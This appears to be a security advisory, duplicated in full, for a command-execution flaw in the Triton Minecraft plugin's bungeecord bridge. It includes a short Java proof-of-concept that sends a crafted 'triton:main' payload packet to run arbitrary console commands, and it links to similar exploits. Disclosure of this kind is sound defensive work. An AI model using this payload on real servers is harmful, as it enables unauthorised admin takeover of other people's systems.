Summary
A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.
Details
When you enable bungeecord mode in the config, the plugin will enable the proxy bridge, and the server will begin to broadcast the triton:main plugin channel.
This channel is used by Triton for communication between the proxy and the server (and vice-versa), and allows to, among other actions, to tell the server to execute any command as the console.
Triton did not filter incoming plugin messaging packets from Players, so a modded client could send a package that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for Privilege Escalation in the Minecraft server, and perhaps even an RCE in the machine itself.
Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server's translations, for instance, but those are less powerful than the above payload.
Proof of Concept
Demonstration video:
POC Video
Demonstration code:
// This is for version 1.8, for later versions the code will change slightly
private void triton(String command) {
try {
ByteArrayOutputStream b = new ByteArrayOutputStream();
DataOutputStream out = new DataOutputStream(b);
out.writeByte(2); // Sub Channel ID
out.writeUTF(command); // Command
PacketBuffer buffer = (new PacketBuffer(Unpooled.buffer()));
buffer.writeBytes(b.toByteArray());
mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer));
} catch(Exception e) {
e.printStackTrace();
}
}This is also a similar exploit to these:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit
Impact
This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true on Triton's config.yml, no matter if they are behind BungeeCord or Velocity or not.
Rilshrink Reporter
diogotcorreia Remediation developer
Summary
A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.
Details
When you enable
bungeecordmode in the config, the plugin will enable the proxy bridge, and the server will begin to broadcast thetriton:mainplugin channel.This channel is used by Triton for communication between the proxy and the server (and vice-versa), and allows to, among other actions, to tell the server to execute any command as the console.
Triton did not filter incoming plugin messaging packets from Players, so a modded client could send a package that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for Privilege Escalation in the Minecraft server, and perhaps even an RCE in the machine itself.
Using this plugin channel, the malicious player is able to send a payload packet containing a byte (
2) and a string (any Spigot command).Other payloads could also be sent, which could mess with the server's translations, for instance, but those are less powerful than the above payload.
Proof of Concept
Demonstration video:
POC Video
Demonstration code:
This is also a similar exploit to these:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit
Impact
This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have
bungeecordset totrueon Triton'sconfig.yml, no matter if they are behind BungeeCord or Velocity or not.